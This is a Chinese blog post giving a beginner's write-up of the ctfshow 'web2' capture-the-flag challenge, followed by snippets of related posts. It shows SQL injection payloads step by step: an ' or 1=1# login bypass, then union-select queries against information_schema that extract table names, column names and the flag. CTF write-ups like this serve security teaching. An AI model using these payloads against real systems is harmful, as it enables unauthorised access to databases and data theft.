ctfshow web2

最新推荐文章于 2024-07-22 21:18:48 发布
最新推荐文章于 2024-07-22 21:18:48 发布
阅读量2.8k 收藏 4
点赞数 10
分类专栏: ctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51866363/article/details/109844896
版权

ctfshow web2 writeup

这是本人第一次写blog,有不好的地方希望大家多多指出
从此开始踏上了网安的不归路,成为了一只web狗
在这里插入图片描述

从题目可以看出这是一道sql注入的题
在这里插入图片描述

示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。

首先我们尝试使用万能密码
admin
'or 1=1#

在这里插入图片描述
**这里可以发现我们已经登陆成功了

接下来我们使用联合查询来查询回显位置**

1’ or 1=1 union select 1,2,3 #

在这里插入图片描述
爆表

1’ or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

在这里插入图片描述
成功

再接再厉,接下来就是爆字段

1’ or 1=1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name=‘flag’#

在这里插入图片描述
胜利就在眼前**,进行最后一步,取数据**

1’or 1=1 union select 1,flag,3 from flag#

在这里插入图片描述

总结:

至此就已经完成了这道简单的sql注入题目,成功拿到flag

Cris Jeason
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTFshow_web2
zoixsoadji的博客
02-28 2245
进入题目,发现题目很简单,首先试试万能密码登陆。 登陆成功,接下来使用bp抓包,并且寻找注入点。 找到注入点,接下来看看它的2下面有什么 查到表名为web2的数据库,接下来继续注入,查询字段。 查找到了flag和user两个数据表,接下来查询字段 最后查询字段内容,得到flag 本人萌新,大佬手下留情 >_< ...
CTFshow Web2解题思路详解
asdfghjklqwwe的博客
05-17 961
ctfshow web2 的解题思路详解
CTF——web2
weixin_50699777的博客
04-22 292
系列文章目录 CTF系列——反序列化漏洞 题目 找flag,网址进不去就不提供了 解题 题目提示,输入验证码即可,但是在我们要输入的时候发现,输入框只可以输入一个字符,所以我们要更改他的设置 把他的宽度设为3 成功输入验证码,点击提交,出现flag!!!解题成功!!! ...
CTFSHOW game-gyctf web2
最新发布
这周末在做梦的博客
07-22 921
反序列化增逃逸
ctfshow-WEB-web2
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
CTFshow Web2
Lig_HossssT的博客
10-09 443
’ or 1=1 union select 1,database(),3# 查阅数据库得到数据库’web2’ ’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表 ’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字...
ctf.show_web2
Huamang的博客
02-02 792
万能密码回显成功 查询字段数没有回显 那就联合查询union select,从1试到1,2,3发现三个字段,而且回显位置是第二个 所以开始查询表名 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 出现了flag字段,开始查询flag表的字段名 1' union select 1,group_concat(column_name),3 f
2024年ctfshow-WEB-web2_ctf
2401_84252281的博客
05-01 234
首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库中数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输接下来获取flag表的字段接下来获取flag表的数据。
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctf.show web2
qq_53319483的博客
11-16 3404
ctf.show web2
CTF秀web2
天天学安全专属博客
11-20 1009
CTF秀web2,union注入详解
ctf show web2
yystarry的博客
12-29 216
我们点击View Hint得到“通过在url头部添加view-source:” 我们可以知道,url指的是一种资源定位符号,我们看这个要我们加入的字符,他的结尾有“:”,因此我们可以知道这串字符应该在头部加入 这样我们就得到了flag{cb46cd86-8f4a-4708-bb1d-55f2d8cbea1c} ...
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 1891
自用
ctfshow之web2
夜未至
03-21 291
本人开了一个知识星球,在星球里每天更新网络安全的文章,其中包含在安全中用到的工具和脚本,分享全国职业技能大赛的相关具体细节及解题思路,在星球中有问必答。然后在地址栏回车,就可以查看网页源代码了,获取到flag:ctfshow{42393163-8074-436c-8383-425d3bd989b6}同样也是开发人员忘记了在发布版本去掉那些注释,只不过web2里禁用了右键检查而已,查看源代码的方式还是有很多,总结:前端验证都是不安全的验证。
CTFshow web入门 web2
weixin_45990644的博客
07-06 488
CTFshow web入门 web2 点开链接,发现鼠标右键无法调出快捷菜单,按F12也没用。这可能也对应了题目的“JS前台拦截”。(不懂,我猜应该是) 通过手动点击浏览器开发者工具(我用的是谷歌浏览器,在浏览器关闭按钮下方的三个小点里,也可以利用浏览器开发者工具的快捷键来打开) 点开后可以看到代码界面,在注释中看到flag: 补充: 看群主视频发现还有俩方法可以查看: 1)打开开发者页面后点击控制台左上角一个半正方形包围鼠标图标的一个按钮,选中后点击页面中的“无法查看源代码”,也会显示代码页面(有
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值